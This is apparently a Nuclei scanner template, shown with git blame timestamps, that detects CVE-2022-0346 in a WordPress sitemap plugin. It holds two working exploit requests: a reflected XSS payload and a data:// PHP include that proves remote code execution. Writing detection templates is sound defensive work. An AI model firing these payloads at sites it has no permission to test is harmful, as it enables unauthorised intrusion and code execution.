2022-05-19 17:59:08 +00:00
id : CVE-2022-0346
info :
2022-12-09 21:40:18 +00:00
name : WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
2022-11-14 07:56:06 +00:00
author : Akincibor,theamanrawat
2022-12-09 21:59:49 +00:00
severity : medium
2022-05-19 18:07:56 +00:00
description : |
2022-12-09 21:40:18 +00:00
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
2022-05-19 17:59:08 +00:00
reference :
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
2022-05-19 18:07:56 +00:00
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0346
2022-05-30 09:21:28 +00:00
classification :
2022-12-09 21:59:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0346
2022-12-09 21:59:49 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:*:*:*
epss-score : 0.00071
2022-05-19 18:07:56 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-12-09 21:59:49 +00:00
verified : "true"
2022-11-14 08:14:12 +00:00
tags : wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
2022-05-19 17:59:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-19 17:59:08 +00:00
- method : GET
path :
2022-05-19 18:07:56 +00:00
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-11-13 11:37:15 +00:00
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-05-19 17:59:08 +00:00
2022-08-29 17:23:18 +00:00
stop-at-first-match : true
2022-05-19 18:07:56 +00:00
req-condition : true
2022-05-19 17:59:08 +00:00
matchers :
- type : word
2022-11-13 11:31:19 +00:00
part : body_1
2022-05-19 17:59:08 +00:00
words :
2022-11-13 11:31:19 +00:00
- "<img src onerror=alert(document.domain)>"
- "Invalid Provider type specified"
condition : and
2022-09-10 01:55:52 +00:00
2022-11-13 11:31:19 +00:00
- type : word
part : body_2
words :
2022-11-14 07:56:06 +00:00
- "2ef3baa95802a4b646f2fc29075efe34"
2022-12-09 21:40:18 +00:00
# Enhanced by md on 2022/12/09